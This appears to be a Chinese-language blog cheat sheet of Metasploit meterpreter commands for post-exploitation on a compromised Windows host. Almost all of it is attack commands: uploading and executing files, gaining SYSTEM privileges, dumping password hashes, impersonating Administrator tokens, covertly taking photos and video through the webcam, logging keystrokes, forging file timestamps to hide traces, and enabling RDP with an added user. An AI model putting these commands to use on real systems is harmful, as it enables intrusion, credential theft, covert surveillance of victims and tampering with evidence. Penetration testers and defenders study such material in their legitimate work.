一、上传文件到windows主机
meterpreter > upload -r /home/liangzeyu.rtf c:\\
下载
meterpreter > download -r c:\\liangzeyu.rtf
执行文件
meterpreter > execute -f c:\\liangzeyu.exe
二、 创建cmd新通道
execte -f cmd -c 或者shell
三、显示进程数
ps
四、 获取admin权限(提权)
getsystem
五、 获取用户密码
hashdump 可以获取用户密码,转换hash值
六、端口转发
portfwd add -l 6666 -p 3389 -r 127.0.0.1
删除端口转发
portfwd delete -l 6666 -p 3389 -r 127.0.0.1
七、在目标主机搜索文件
search -f liangzeyu.*
八、获取用户id
getuid
九、 获取系统信息
sysinfo
十、模拟任意用户(token操作)
getuid 获取用户id
use incognito
list_tokens -u 查看所有用户列表
impersonate_token "WIN-7PLJUR8G6DH\Administrator" 切换admin用户
getuid 获取用户id
##如果用admin用户切换system用户的话需要先使用getsystem提权
十一、 webcam摄像头
webcam_list 查看摄像头列表
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频
十二、执行文件
execute -H -i -f cmd.exe #创建新进程 cmd.exe,-H不可见,-i 交互 (加了-i会弹出对话框)
十三、 伪造时间(将另一个文件的时间拷贝给另一个文件)
timestomp c:// -h 查看帮助
timestomp -v c:\\2.txt 查看时间戳
timestomp c:\\2.txt -f c:\\1.txt 将1.txt文件时间戳复制给2.txt时间戳
十四、 enable_rdp 脚本开启3389端口
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=test2 PASSWORD=123456 #添加用户
添加成功后进入shell,使用net user查看用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
十五、键盘记录
keyscan_start 开始监听
keyscan_dump 下载监听到的内容
keyscan_stop 停止监听
其他mfs命令
https://xz.aliyun.com/t/2536
有问题请加博主微信进行沟通!
全部评论